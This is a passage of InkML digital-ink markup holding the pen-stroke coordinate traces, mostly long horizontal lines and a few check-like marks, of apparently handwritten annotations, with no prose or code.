0-16,40 0 15,-39 0-15,19 0 16,-20 0-16,-19 0 15,-20 0 1,-1 0-16,-19 0 0,0 0 16,0 0-16,0 0 15,-1 0 1,1 0 15,-20 20-31,20-20 16,0 0 15,0 0-15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5:10.4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232 15769 0,'18'0'110,"-1"0"-110,1 0 15,17 0-15,36 0 16,70 0-16,0 0 16,18 0-16,-36 0 15,18 0-15,0 0 16,53 0-16,-35 0 15,70 0-15,-70 0 16,-18 0 0,0 0-16,-35 0 0,-53 0 15,-35 0 17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19.7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4 4198 0,'17'0'63,"107"71"-63,17 87 16,-88-69-16,17 16 15,-34-16-15,-1-37 16,-17-16-16,-1-19 15,1 1-15,-1-18 79,19 0-64,52-71-15,18-17 16,-18 0-16,0 0 15,53-53-15,-17 17 16,-36 54-16,-35 17 16,-18 0-16,-17 53 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1263.0311">459 9366 0,'17'0'62,"71"36"-46,-35 122-16,-17-105 16,52 35-16,-18-17 15,1-18 1,-18-18-16,-36-17 0,1-1 15,123-105 32,36-35-31,87-71-16,-17 17 16,88-34-16,-176 105 15,-18 0-15,-35 18 16,-18 17-16,-53 54 15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09.9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28 4128 0,'53'0'16,"0"17"0,18 18-16,-36-17 15,0-18-15,18 0 16,-18 18-16,36-18 15,35 17-15,0 1 16,35 0-16,0-18 16,0 0-16,0 0 15,-18 0-15,-34 0 16,-36 0-16,-36 0 16,1 0 46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17.8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92 8944,'-18'0,"18"-18,-18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14.8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58 5644 0,'0'18'47,"17"-18"-47,19 0 16,52 0-16,35-18 15,1 1 1,34 17-16,-16 0 16,-1 0-16,-18 0 15,-17 0-15,-53 0 16,-35 0-16,-1 0 31,1 0-15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18.3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48 4533 0,'35'0'63,"0"0"-48,142-17 1,-107-19-16,36 36 15,-53 0-15,0 0 16,0-17-16,0 17 16,0 0-16,0 0 15,0 0-15,0 0 16,0 0 0,-18 0-16,18 0 0,17 0 15,-17 0 1,0 0-16,-18 0 0,18 0 15,-17 0-15,16 0 32,-16 0-32,-1 0 0,0 0 15,-17 0-15,17 0 16,-17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20.2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47 4322 0,'18'0'0,"-1"0"15,19 0 1,17 0-16,17 0 15,36 0-15,-18 0 16,53 0-16,-17 0 16,17 0-16,-18 0 15,36 0-15,0 0 16,17 0-16,1 0 16,17 0-16,0 0 15,-18 0-15,36 0 16,-1 0-1,1 0-15,53 0 16,-18 0-16,-36 0 16,1 0-16,0 0 15,-36 0-15,18 0 16,-35 0-16,17 0 16,-17 0-16,-18 0 15,0 0-15,124 0 31,-142 0-31,-17 0 0,18 0 16,17 0-16,-18 0 16,1 0-16,17 0 15,-35 0-15,17 0 16,-35 0-16,18 0 16,18 0-16,-36 0 15,-18 0-15,36 0 16,-53 0-16,18 17 15,-18-17-15,-18 0 16,0 0 0,0 18-16,18-18 15,0 0-15,-18 0 0,18 0 16,0 0 0,-17 0-16,16 0 15,-16 0-15,17 0 16,0 0-16,0 0 15,35 0-15,-18 0 16,18 0-16,18 17 16,-35-17-16,-1 0 15,1 0-15,35 0 16,-53 0-16,17 18 16,1 0-16,-18-18 15,0 17-15,-36-17 16,1 0-16,0 0 15,-1 0-15,1 0 16,17 0-16,0 18 16,-17-18-16,0 0 15,17 18-15,18-18 16,0 0-16,-18 0 16,18 0-16,0 17 15,-18-17-15,-17 18 16,-1-18-1,1 18-15,0-18 16,-1 0-16,19 0 94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33.9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7267 0,'17'0'79,"19"0"-64,-1 0-15,0 0 16,36 0-16,-1 0 15,124 0 1,-70 0-16,17 18 16,-18-1-16,1 1 15,-1 0-15,-34-1 16,-1-17-16,-18 0 16,-34 18-16,-19-18 15,-34 0 141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2:36.2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21 6897 0,'0'0'0,"17"0"31,19 0-15,-1 17-16,18-17 16,17 18-1,1 0-15,-18-1 16,17-17-16,36 0 16,-18 0-16,36 0 15,-1 0-15,-17 0 16,35 0-16,0 0 15,1 0-15,-1 0 0,35 0 16,-35 0 0,18 0-16,-18 0 15,-18 0-15,19 0 16,-19 0-16,-35 0 16,0 0-16,1 0 15,-19 0-15,-17 0 16,0 0-16,0 0 15,0 0-15,-18 0 16,0 0-16,1 0 16,17 0-16,-18 0 15,18 18-15,35 0 16,-53-18-16,18 17 16,0-17-16,-18 18 15,1-18-15,-19 0 16,19 0-16,-1 0 15,-18 18 1,19-18 0,34 17-16,1-17 15,-1 18-15,1-18 16,-4040 0 0,8132 0-16,-4092 0 0,17 17 15,-35-17 1,-18 18-16,0-18 15,1 18-15,122-1 32,-70-17-32,-17 0 15,0 0-15,34 0 16,-34 0-16,123 0 31,-141 0-31,0-17 16,0-1-16,-18 0 15,18 18-15,0 0 16,0-17 0,53 17-16,-36 0 0,1 0 15,-18 0-15,0 0 16,-1 0 0,1 0-16,-17 0 15,17 0-15,17 0 0,-17 0 16,0 0-16,35 0 15,-35 0 1,18 0-16,-1 0 16,1 0-16,17 0 15,-53 0-15,1 0 16,-1 0-16,18 0 16,-36 0-16,36 0 15,0-18-15,0 1 16,35 17-16,-35 0 15,18 0-15,17-18 16,18 0-16,-36 1 16,54-1-16,-18 0 15,-53 18-15,35-17 16,-35-1-16,0 18 16,-36 0-16,19 0 15,-19-18-15,1 1 16,-1 17-16,1 0 15,0 0-15,17 0 16,-17 0 0,-1 0-16,1 0 15,0 0 1,-1 0 0,1 0-1,-1 0 48,19 0-48,-1 0-15,0 17 16,18 1-16,-18 0 16,-17-1-16,17-17 15,-17 0-15,0 18 16,-1-18-1,19 0-15,-1 18 16,-18-18 15,1 17-31,0-17 32,-1 18-17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3:43:19.7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249 7161 0,'-17'-17'32,"-18"17"-32,-18 0 15,0 0-15,17 0 16,-34 0-16,35 0 16,-54 0-1,19 0-15,-1 0 16,-17 17-16,18-17 15,-1 18-15,0-18 16,-17 18-16,0-18 16,17 0-16,-34 0 15,34 0-15,1 0 16,-1 17-16,18 1 16,-35 0-16,35-18 15,-18 17-15,-87-17 31,34 0-31,-17 0 0,0 0 16,0 0-16,-36 0 16,36 0-16,0-17 15,-35-36-15,17 35 16,0 0-16,-17-17 16,-18 17-16,35 1 15,18-1-15,0 1 16,17 17-16,-52 0 31,106 0-31,-1 0 0,18 0 16,18 0-1,0 0-15,-1 0 16,19 0 46,-1 0-46,-17 0 0,17 0-16,0 0 15,1 0 1,-1 0 31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11.2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11 12330 0,'35'17'0,"0"1"16,1-1-16,-1-17 15,18 0-15,17 18 16,-17-18-16,35 0 16,18 0-16,-18 0 15,36 0-15,-36 0 16,18 0-16,-18 0 15,18 0-15,-36 0 16,19 0-16,-36 0 16,-18 0-16,0 0 15,0 0 1,-17 0 140,0 0-140,-1 0-16,19 0 15,-1 0 1,-17 0-16,123 0 47,-106 0-47,88 0 16,-4180 0 3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13.6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14 12400 0,'0'0'0,"35"0"16,-17 0-1,35 0-15,0 0 16,17 0-16,36 0 16,-18 0-16,36 0 15,-1 0-15,36 0 16,-18 0-16,0 0 16,0 0-16,-17 0 15,-1 0-15,1-35 16,-36 35-16,53-18 15,18-17-15,-53 35 16,35 0-16,35 0 16,-17 0-16,35 0 15,-18 0-15,18 0 16,0 0-16,-17 0 16,-19 0-16,19 0 15,-36 0-15,-18 0 16,18 0-16,1 0 15,16 0-15,1 0 16,35 0 0,-53 0-16,53 0 15,-17 0-15,17 0 16,-18 0-16,0 0 16,-34 0-16,-1 0 15,0 0-15,-53 0 16,18 0-16,-18 0 15,18 0-15,-36 0 16,19 0-16,-19 0 16,36 0-16,-35 0 15,-36 0-15,0 0 16,0 0-16,-17-18 16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17.7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720 12577 0,'-17'0'78,"70"0"-62,52 0-1,19-18-15,35 0 16,70 1-16,-35-1 16,18-35-16,-18 53 15,-71 0-15,-70 0 16,-35 0-16,-1 0 15,1 0-15,0 0 16,-1 0-16,18 0 16,-17 0-1,0 0-15,-1 0 32,1 0-17,0 0 16,-1 0 1,1 0-32,0 0 15,17 0 1,0 18 0,36 35-16,-36-18 15,0 18-15,1-18 16,-19 18-16,1-35 15,-18-1-15,17-17 16,1 18 0,0-18 62,-1 0-47,1 0 16,-36 0 234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17.9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66 12753 0,'-17'0'3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18.2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38 8890,'0'0,"36"-18,19 18,-19 0,73 0,-19 0,1 0,36 0,18 0,0 0,1 0,35 0,55 0,18 0,0 0,18 18,-36 18,-18-36,-1 18,1 19,0-1,18-18,-19 0,-17 19,-19-19,-54 0,-18 0,0-18,-18 0,-55 0,18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19.1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22 13829 0,'-18'0'31,"124"0"16,35 0-47,35 0 16,54 0-1,34 0-15,71-18 16,-52 18-16,-19 0 15,-17 0-15,141 0 32,-317-17-32,-36 17 0,-17 0 15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11:24.7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045 10914 0,'20'0'47,"0"0"-32,20 0 1,-21 0-16,41 0 16,-1 0-16,21 0 15,-60 0-15,79 0 16,20 0-16,0 0 15,0 0-15,-40 0 16,60 0-16,-39 0 16,38 0-1,-38 0-15,-21 0 16,20 0-16,-19 0 16,-1 0-16,20 0 15,20 0-15,-39 0 16,-1 0-16,20 0 15,-59 0-15,59 0 16,0 0-16,-39 0 16,-1 0-16,-39 0 15,20 0-15,-20 0 157,0 0-142,0-20-15,19 20 16,1 0-1,0 0-15,-1 0 16,-19 0-16,0 0 16,0 0-16,0 0 15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11:25.95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927 11251 0,'0'-20'47,"39"20"-16,1 0-31,59 0 15,1 0-15,19 0 16,0 0-16,20 0 16,19 0-16,1 0 15,0 0-15,-20 0 16,39 0-16,-138 0 16,139 0-16,-21 0 15,-39 0-15,20 0 16,-20 0-16,-19 0 15,-21 0-15,0 0 16,-19-20-16,-1 1 16,1-1-16,-20 20 15,19-20-15,1-20 16,39 20-16,-20 20 16,20 0-16,21 0 15,-81 0-15,41 0 16,-21 0-16,-39 0 15,0 0-15,0 0 32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22.9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8 4216 0,'17'0'63,"1"0"-48,52 17-15,-34 1 16,-36 0-16,17-18 16,1 0-16,0 0 15,-1 0 1,1 0-1,0 0-15,-1 0 16,36 0 0,-35 0-16,52 0 15,89-124-15,-53 89 16,53-71-16,-18 18 16,18 17-16,-54 18 15,-87 18-15,17 0 16,-17 17-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1344.3438">1499 6844 0,'0'-18'31,"106"89"-15,-35 35-16,-54-71 16,54 53-16,35-70 15,-53 35-15,-18-18 16,35 0-16,-52-35 16,0 18-1,35-36 1,17-52-16,1-36 15,52 0-15,36-17 16,53-36-16,-1 0 16,-17 18-16,36-18 15,-125 89-15,-52 17 16,-17 35-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2592.0487">1111 12083 0,'0'-18'47,"36"18"-32,34 141 1,-35-106-16,18 36 16,-17-36-16,-1 0 15,-18 1-15,19-1 16,-19-17-16,19 35 16,-19-18-16,1 0 15,0-17-15,-1-1 16,1 1-16,17 17 31,53-88 32,-35-88-48,35 35-15,-17-52 16,0-36-16,-19 17 15,19 54-15,-36 17 16,1 18-16,-19 53 16,-17-1-1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3:59.2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93 4269 0,'0'-18'62,"18"18"-46,17-18-16,18 1 15,17 17-15,36-18 16,0 0-16,70 1 16,-52-1-16,17 18 15,-18-17-15,-34 17 16,-19 0-16,-17 0 16,-18 0-16,-17 0 15,17 17-15,1-17 31,-36 18-15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12.1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50 4357 0,'53'0'47,"-18"0"-47,18 0 16,17 0-1,19 0-15,-1 0 0,0 0 16,0 0-1,0 0-15,-17 0 16,-18 0-16,0 0 16,0 0-16,-18 0 15,36 0 1,-54 0-16,18 0 16,-17 0-1,0 0 1,17 0-16,-17 0 15,35 0-15,-1 0 16,1 0 0,0 0-16,-17 0 0,16 0 15,-16 0-15,-1 0 16,0 0 0,18 0-16,-35 0 0,35 0 15,-36 0 1,1 0-16,0 0 15,-1 0-15,1 0 16,0 0-16,-1 0 16,1 0-1,0 0-15,17 0 16,0 0-16,18 0 16,-18 0-16,-17 0 15,17 0-15,0 0 16,-17 0-16,17 0 15,1 0-15,17 0 16,-18 0-16,18 0 16,0 0-16,0 0 15,0 0-15,-18 0 16,18 0-16,17 0 16,-17 0-16,18 0 15,-18-18-15,35 1 16,-4092-1-16,8131 18 15,-4074-18-15,-35 18 16,35 0-16,-36 0 16,1-17-1,17 17 32,-17 0-31,0 0-16,-1 0 15,1 0 1,0 0 15,-1 0-15,18 0 0,-17-18-16,17 18 15,18 0-15,-17 0 16,158 0 15,-177 0-31,1 0 16,35 0-16,-18 0 15,18 18-15,0-18 16,0 17-16,-36-17 16,1 0-16,0 0 15,-1 0 1,1 18 15,0-18 0,-1 0-15,1 0 62,0 0-62,-1 0 15,1 0 0,-1 0 16,-17 18-47,18-18 31,0 0 1,17 17-17,18-17-15,-35 0 47,-1 18-31,-34-18 296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14.7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047 4427 0,'18'0'94,"17"0"-79,18 0-15,0 0 16,18 0-16,17 0 16,0 0-16,36 0 15,-1 0-15,0 0 16,-34 0-16,17 0 15,-18 0-15,-18 0 16,1 0-16,-18 0 16,0 0-16,-18 0 15,0 0-15,0 0 16,-17 0-16,0 0 16,-1 0-16,1 0 15,0 0 1,17 0-16,-17 0 15,17 0 1,-18 0-16,19 0 16,17-17-16,0 17 15,17 0-15,1 0 16,-1 0-16,36 0 16,-35 0-16,-1 0 15,-17 0-15,0 0 16,-18 0-16,1 0 15,-1 0-15,-17 0 16,-1 0-16,1 0 16,-1-18-1,1 18-15,0 0 16,17 0-16,36 0 16,-19 0-16,1 0 15,0 0-15,0 0 16,-18 0-16,18 0 15,-17 0-15,17 0 16,-18 0-16,0 0 16,18 0-16,18 0 15,-1 0-15,-17 0 16,0 0-16,18 0 16,-36 0-16,18 0 15,-18 0 1,18 0-16,0 0 15,0 0-15,-18 0 16,18 0-16,0 0 16,0 0-16,-18 0 15,36 0-15,-36 0 16,18 0-16,-18 0 16,0 0-16,1 0 15,17 0-15,0 0 16,17 0-16,36 0 15,-18 0-15,18 0 16,-35 0-16,17 0 16,-18 0-16,-17 0 15,18 0-15,-18 0 16,17 0-16,-17 0 16,0 0-16,70 0 31,-70 0-31,18 0 15,0 0-15,-19 0 0,-16 0 16,17 0-16,-18 0 16,0 0-1,18 0-15,0 0 16,0 0-16,18 0 16,17 0-16,-18 0 15,36 0-15,0 0 16,17 0-16,-17 0 15,71 0 1,-72 0-16,-16 0 16,34 0-16,-35 0 15,36 0-15,-1 0 16,1 0-16,17 0 16,-53 0-16,35 0 15,-34 0-15,34 0 16,-35 0-16,36 0 15,-18 0-15,-18 18 16,0-1-16,0 1 16,-17-18-16,17 18 15,-35-18-15,17 0 16,-34 17-16,17 1 16,-36-18-16,1 0 15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22.2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74 5574 0,'17'0'94,"19"0"-78,-1 0-16,0 0 15,0 0 1,1 0-16,-1 0 15,0 0-15,0 0 16,1 0-16,17 0 16,-36 0-16,1 0 15,0 0-15,17 0 16,0 0-16,-17 0 16,17 0-16,0 0 15,18 0 1,-17 0-16,-1 0 15,-18 0-15,36 0 16,-17 0 0,-1 0-16,-17 0 0,17 0 15,-18 0-15,1 0 32,0 0-32,-1 0 31,1 0-16,17 0 1,-17 0 0,17 0-16,-17 0 15,17 0 1,-17 0-16,-1 0 0,1 0 16,0 0-1,17 0-15,-17 0 16,-1 0-16,19 0 15,-19 0-15,18 0 16,1 0 0,-19 0-16,36 0 15,0 0-15,0 0 16,0 0-16,0 0 16,0 0-16,0 0 15,0 0-15,0 0 16,0 0-16,-18 0 15,0 0-15,0 0 16,18 0 0,-17 0-16,69 0 15,107 18 17,-177-18-17,18 17-15,-35-17 16,35 0-16,0 0 15,-36 0-15,19 0 16,52 0 15,-53 0-31,0 0 16,18 0-16,0 0 16,18 0-16,52 0 15,-35 0-15,18 0 16,-18 0-16,-17 0 15,35 0-15,-18 0 16,-17 0-16,158 0 31,-159 0-31,1 0 16,-18 0-16,18 0 16,-1 0-16,1 0 15,-18 0 1,17 0-16,-17 0 0,0 0 15,-18 0-15,18 0 16,0 0 0,-18 0-16,36 0 0,-36 0 15,18 0 1,0 0-16,0 0 16,-18 0-16,18 0 15,0 0-15,0 0 16,0 0-16,-18 0 15,0 0-15,18 0 16,-17 0-16,-1 0 16,0 0-16,0-17 15,18 17-15,-35 0 16,17 0-16,18-18 16,-35 18-16,35-18 15,-18 18-15,18 0 16,17 0-16,19 0 15,-19 0-15,36 0 16,-18 0-16,18 0 16,0 0-16,17 0 15,1 0-15,-18 0 16,0 0-16,-18 0 16,-18 0-16,18 0 15,-35 0-15,0 0 16,-17 0-16,-1 18 15,-18-18-15,1 0 16,0 0-16,17 0 16,-17 0-16,17 0 15,-17 18 1,-1-18-16,1 0 16,-18 17 28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24.0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327 5750 0,'0'0'0,"-71"0"16,1 0-16,17 0 15,35 0-15,-17 0 16,17 0 0,1 0-1,-1 0-15,0 0 32,1 0-17,-1 0-15,0 0 16,-17 0-16,0 0 15,0 0-15,-18 0 16,-18 0-16,1 0 16,-19 0-16,-17 0 15,36 0-15,-18 0 16,17 0 0,-17 0-16,17 0 15,36 0-15,-18 0 16,36 0-16,-19 0 15,1 0-15,-18 0 16,36 0-16,-19 0 16,19 0-16,-19 0 15,19 0-15,-1 0 16,0 0-16,-35 0 16,36 0-16,-18 18 15,-1-18-15,1 18 16,-18-18-16,18 0 15,-18 0-15,18 17 16,-1-17-16,1 18 31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25.6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197 5715 0,'0'0'0,"17"-18"31,36 18-15,18 0-16,52 0 15,-17 0-15,17 0 16,36 0-16,-35 0 16,-1 0-1,1 0-15,-54 0 16,-35 0-16,1 0 0,-19 0 15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20.4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298 10432,'18'-18,"36"0,19 18,0 0,72-18,18 18,55 0,18 0,54 0,-18 0,73 0,-109 0,126 0,-89 0,-38 0,-17 0,18-37,36 37,-72 0,-1 0,1 0,-73 0,18 0,0 0,-18 0,18 0,0 0,1 0,-38 0,38 0,-19 0,18 0,0 0,-18 0,18-18,-18 0,0 18,-36-18,-1 0,1 18,-36-36,-19 36,-18 0,0 0,-18-19,18 19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26.6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328 5592 0,'-53'-18'46,"18"18"-30,-53 0-16,-18 0 16,0 0-16,-35 0 15,0 0-15,-18 0 16,53 0-16,-17 0 16,-1 0-16,36 0 15,-18 0 1,36 0-16,17 0 0,18 0 15,17 0-15,0 0 16,1 0 0,-1 0-1,0 0 1,1 0 0,-19 0-1,19 0 1,-18 0-1,17 0-15,-17 0 16,17 0-16,0 0 16,1 0 62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4:46.0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28 10901 0,'0'0'0,"18"0"0,-1 0 15,1 0 1,0 0-16,17 0 0,-17 0 15,-1 0 1,36 0-16,-17 0 16,34-18-16,-17 18 15,18 0-15,-1 0 16,-17 0-16,18 0 16,-19 0-16,19 0 15,0-17 1,-19 17-16,-16 0 15,52 0 1,-70 0 0,-1 0-16,19 0 0,-19 0 15,1 0 1,-1 0 0,1 17-16,0-17 15,-1 0-15,1 0 16,0 0-1,-1 0 17,1 0-17,0 18-15,-1-18 16,1 0 0,17 0-1,-17 0 1,17 0-1,-17 0-15,-1 0 16,1 17 0,0-17-16,-1 0 15,1 0 1,0 0-16,-1 0 16,1 0-1,-1 0 1,1 0 15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17.8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768 10936 0,'35'-18'63,"18"18"-63,18 0 15,17 0 1,53 0-16,-18 0 15,36 0-15,-18 0 16,36 0-16,-36 0 16,0 0-16,0 0 15,-35 0-15,35 0 16,-18 0-16,18 0 16,-17 0-16,-1 0 15,-34 0-15,-19 0 16,1 0-16,-18 0 15,-1 0-15,-16 0 16,-1 0-16,18 0 16,-18 0-16,36 0 31,-18 18-31,0-18 0,17 0 16,18 18-16,1-1 15,16-17-15,89 36 31,-88-19-31,-53 1 0,18-18 16,-36 0-16,18 0 16,-35 0-1,-1 0-15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19.4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22 12259 0,'0'-18'0,"-36"18"0,1 0 15,0 0-15,-18 0 16,18 0-16,-36 0 16,-35 0-16,36 0 15,-19 0-15,-16 0 16,16 0-1,1 0-15,-18 0 0,36 0 16,-18 0 0,-1 0-16,1 0 15,18 0-15,-19 0 16,1 0-16,18 0 16,-1 0-16,18 0 15,-17 0-15,34 0 16,1 0-16,17 0 15,-17 0-15,18 0 16,-1 0 0,0 0-1,1 0 1,-1-17 125,18-1-126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21.2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95 12136 0,'-18'17'0,"1"-17"31,-19 0-31,1 0 0,-18 0 16,18 0-16,-36 0 16,1 0-1,-18 0-15,-18 0 0,18 0 16,-36 0 0,-35 0-16,18 0 15,0 0-15,-35 0 16,-1 0-16,19 0 15,-36 0-15,0 0 16,17 0-16,-17 0 16,0 0-16,-17 0 15,34 0-15,18 0 16,18 0-16,0 0 16,35 0-16,36 0 15,-1 0-15,36 0 16,0 0-16,-1 0 15,19 0-15,-1 0 16,0 0 0,1 0-1,-1 0 1,1 18-16,-1-18 16,-17 0-1,17 0 1,0 0-16,-17 17 15,0-17 1,0 0-16,17 0 16,-17 18-16,-1-18 15,1 0-15,0 0 16,-1 0 0,19 0-1,-1 0 1,1 0 15,-1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2:00.9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08 13315 0,'20'0'47,"99"0"-31,0 0-16,60-20 15,59 20-15,20 0 16,0 0-16,-159 0 15,179 0-15,-79 0 16,-1 0 0,-39 0-16,-1 0 0,200 0 31,-140 0-31,-39 0 16,39 0-16,40 20 0,-20 39 15,20 21-15,-20-60 16,0 19-1,1052-19 48,-1171-20-63,40 0 16,0 0-16,39 0 15,0 0-15,21 0 16,19 0-16,0 0 15,-59 0-15,-21 0 16,21 0-16,-1 0 16,-19 0-16,0 0 15,-100 0-15,100 0 16,20 0-16,-1 0 16,21 0-16,-1 0 15,1 0-15,-21 0 16,-19 0-16,0 0 15,0 0-15,-1 0 16,-19 0-16,20 0 16,0 20-16,-20 0 15,-20 20-15,0-1 16,-40-19 0,-59-20-16,20 0 15,19 0-15,1 0 16,-21 0-16,21 0 15,0 0-15,-1 0 16,1 0-16,356 0 47,-317 0-47,21 0 16,38 0-16,-19 0 15,20 0-15,-80 0 16,100 0-16,-40 0 15,20 0-15,-40 0 16,20 0-16,-20 0 16,-20 0-16,0 0 15,40 0-15,0 0 16,20 0 0,-1 20-16,1-20 0,-20 0 15,0 0-15,-40 20 16,0 19-16,-19-19 15,-60-20 1,79 0-16,20 0 0,-60 0 16,1 0-1,-20 0-15,-1 0 16,-19 0-16,0 0 47,-20 20-32,20-20 1,0 0 0,-20 20 46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27.2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9 4621 0,'0'0'0,"35"0"78,0 0-62,107 89-16,-37-54 15,-34 18-15,-53-53 16,17 0-16,-17 0 15,17 0-15,-18 0 16,36 0 0,0-18-1,35-70-15,1-18 16,52-53-16,-35 18 16,-18 35-16,-18 36 15,19-18-15,-54 35 16,-18 53-16,19-36 15,-19 36-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1048.7579">706 10513 0,'0'0'0,"0"-18"16,17 1-16,1 17 15,17 0-15,53 88 16,0 53-16,-52-71 16,34 36-16,19-18 15,-1 18-15,-35-53 16,-36 18 0,19-71-16,52-230 93,-53 107-93,18 17 16,-18-35-16,36 35 16,-36 36-16,36-54 15,-18 1-15,-1 34 16,-34 72-16,-18-1 15,0 1-15,0-1 16,18-17 0,17 17-1,-35 0-15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32.5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57 5662 0,'0'-18'78,"18"18"-78,-1 0 15,54 0-15,-1 0 16,36 0-16,0 0 16,17 0-16,1 0 15,-36 0-15,36 0 16,-36 0-16,-18 0 15,19 0-15,-37 0 16,-16 0-16,-1 0 16,-17 0-16,-1 0 31,1 0 47,0 0-62,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0-15,-1 0 16,1 0-1,0 0-15,-1 0 16,1 0 0,0 0-16,-1 0 15,1 0-15,17 0 16,-17 0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34.0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89 5997 0,'0'-17'47,"18"-1"-32,0 18-15,35 0 16,0 0 0,-18 0-16,0-18 15,18 18-15,0-17 16,-18 17-16,18-18 15,-35 18-15,-1 0 16,19 0-16,-19 0 16,1 0-1,0-18-15,-1 18 16,1 0 0,0 0-1,-1 0 1,1 0-1,-1 0-15,1 0 32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6:35.6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4339 0,'0'18'78,"17"-18"-78,1 0 16,-1 0-16,19 17 16,-1-17-16,18 0 15,35 18-15,0-18 16,36 0-16,-1 0 15,18 35 1,36-17-16,-1-18 16,1 0-16,-1 0 15,-35 18-15,0-18 16,-53 0-16,1 0 16,-37 0-16,-16 0 15,17 0-15,-36 0 16,19 0-16,-19 0 15,1 0-15,0 0 16,-1 0 0,1 0-16,-1 0 15,1 0-15,0 0 16,17 0-16,0 0 16,18 0-16,0 0 15,-18 0-15,18 0 16,-17 0-16,-1 0 15,-18 0-15,19 0 16,-1 0-16,-17 0 16,17 0-16,-17 0 15,35 0-15,-1 0 16,1 0-16,0 17 16,0 1-16,-18-18 15,1 18-15,-19-18 16,1 0-1,0 17 1,-1-17-16,1 0 16,0 0-16,-1 0 15,1 0-15,17 0 16,-17 0-16,-1 0 16,1 0-16,0-17 15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27.9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81 10033,'18'0,"37"0,54 0,36 0,72 0,1 18,0-18,36 0,-18 0,72 0,-90 0,-37 0,19 0,-37 0,0 0,-17 0,17 0,-18 0,-72 0,17 0,19 0,-73 18,1-18,-19 0,0 0,-18 18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06.7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13406 0,'0'0'0,"52"0"16,1 0-16,-17 0 15,-1 0-15,-17 0 16,-1 0-16,1 0 15,0 0 17,-1 0-17,18 0-15,1 0 16,17 0-16,0 0 16,17 0-16,36 0 15,0 0-15,17 0 16,1 0-16,-1 0 15,-17 0-15,17 0 16,-34 0-16,-1 0 16,-18 0-16,1 0 15,-36 0-15,71 0 16,-88 0 0,17 0-16,0 0 15,36 0-15,-36 0 16,0 0-16,36 0 15,-36 0-15,36 0 16,-18 0 0,0 0-16,17 0 15,71 0 1,-35 0-16,-18 0 16,1 0-16,16 0 15,19 0-15,-36 0 16,18 17-16,17 1 15,-34-18-15,16 17 16,-34-17-16,17 0 16,0 18-16,-17 0 15,35-1-15,-18-17 16,18 0-16,-18 18 16,18-18-16,0 0 15,-1 0-15,-16 0 16,16 0-16,-16 0 15,-19 0-15,1 0 16,-18 0-16,17 0 16,-35 0-16,18 0 15,0 0-15,-17 0 16,17 0-16,-36 0 16,1 0-16,17 0 15,-17 0 1,17-18-1,-17 18 1,-1 0 0,1-17-1,0 17 1,34 0 0,-16 0-16,17 0 15,17 0-15,1 0 16,17 0-16,35 0 15,1 0-15,-18 0 16,17 0-16,-52 0 16,35 0-16,-36 0 15,-17 0-15,-35 0 16,-1 0-16,1 0 16,-18-18 109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08.6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18 13317 0,'0'0'0,"35"0"62,18 18-62,-17-18 16,34 0-16,-17 0 16,18 0-1,-1 0-15,18 0 16,-17 0-16,-18 0 15,0 0-15,0 0 16,0 0-16,-18 0 16,0 0-16,0 0 15,-17 0-15,0 0 16,17 0-16,-17 0 16,17 0-16,-18 0 15,36 0-15,-17 0 16,-19 0-16,1 18 47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10.9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104 13406 0,'18'0'31,"0"0"-15,17 0 0,18 0-16,0 0 15,0 0-15,17 0 16,1 0-16,17 0 15,18 0-15,35 0 16,-35 0-16,35 0 16,0 0-16,0 0 15,0 0-15,36 0 16,-36 0-16,17 0 16,1 0-16,18 0 15,-36 0-15,17 0 16,1 0-16,35 0 15,-53 0-15,18 0 16,-4057 0 0,8131 0-16,-4039 0 0,-35 0 15,0 0-15,-18 0 16,0 0 0,-18 0-16,19 0 15,-54 0-15,35 0 16,-52 0-16,-1 0 15,-17 0-15,0 0 16,0 0-16,0 0 16,-35 0-16,-1 0 15,1 0-15,-18-18 16,17 18 0,19-18 30,-19 18-46,36 0 16,-17 0-16,-1 0 16,0 0-16,0 0 15,-17 0-15,17 0 16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12.5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28 11571 0,'0'0'0,"88"0"0,1 0 16,16 0-1,37 0-15,-37 0 16,36 0-16,18 0 16,-53 0-16,35 0 15,-17 0-15,-36 0 0,18 0 16,-18 0-1,-18 0-15,19 0 16,-36 0-16,-1 0 16,1-18-16,0 1 15,0-1-15,35 1 16,18 17-16,18-36 16,17 36-16,18 0 15,17 0-15,0 0 16,18 0-16,-35 0 15,-18 0-15,-17 0 16,-36 0-16,-18 0 16,-17 0-16,-35 0 15,17 0-15,-17 0 16,0 0-16,-1 0 16,1 0-1,-4075 0-15,8184 0 16,-4109 0-16,17 0 15,36 0-15,-18 0 16,17 0-16,-17 0 16,0 0-16,0 0 15,0 18-15,-18-18 16,36 18 0,-36-18-16,18 0 0,-18 0 15,-17 0-15,17 0 16,-17 0-1,0 0-15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14.3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529 11765 0,'18'0'78,"17"0"-63,0 0-15,0 18 16,1-18-16,-1 0 16,18 0-16,0 0 15,17 0-15,1 0 16,-18 0-16,0 0 16,17 0-16,-17 0 15,0 17-15,0 1 16,0-18-16,18 0 15,-18 18-15,-1-18 16,1 0-16,-17 17 16,-1-17-16,0 18 15,-17-18-15,17 0 16,-17 0-16,-1 0 31,1 0 32,17 0-48,1 0-15,-1 0 16,35 0-16,1 0 16,17 0-16,18 0 15,17 0-15,-34 0 16,34 0-16,1 0 15,-19 0-15,1 0 16,-18 0-16,89 0 31,-107 0-31,1 0 0,0 0 16,-19 0-16,1 0 16,-17 0-16,-1 0 15,0 0-15,0 0 31,-17 0-31,0 0 79,-1 0-64,1 0 32,0 0-31,-1-18-1,19 18 1,-19 0-16,1 0 16,0-17-16,-1 17 15,1 0 1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16.9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0 14870 0,'70'0'47,"18"0"-47,89 17 16,-1 1-16,71-18 16,0 0-16,35 0 15,-17 0-15,17 0 16,-53 0-16,-35 0 15,-35 0-15,-53 0 16,-35 0-16,-54 0 16,1 0-16,-1 17 93,1-17-77,0 0 0,-1 18-1,19-18-15,-19 0 16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18.6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79 14781 0,'18'0'16,"35"0"0,17 0-16,1 0 15,17 0-15,53 18 16,0-18-16,53 0 16,0 0-1,-17 0-15,17 0 0,247 0 31,352 0 1,-616 0-32,-36 0 0,-35 0 15,17 0 1,-35 0-16,-35 0 0,0 0 16,0 0-16,-18 0 31,-17 0-31,17 0 15,-17 0 1,17 0 0,18 0-16,0 0 15,0 0-15,35 0 16,-17 0-16,-1 0 16,18 0-16,1 0 15,-19 0-15,-17 0 16,18 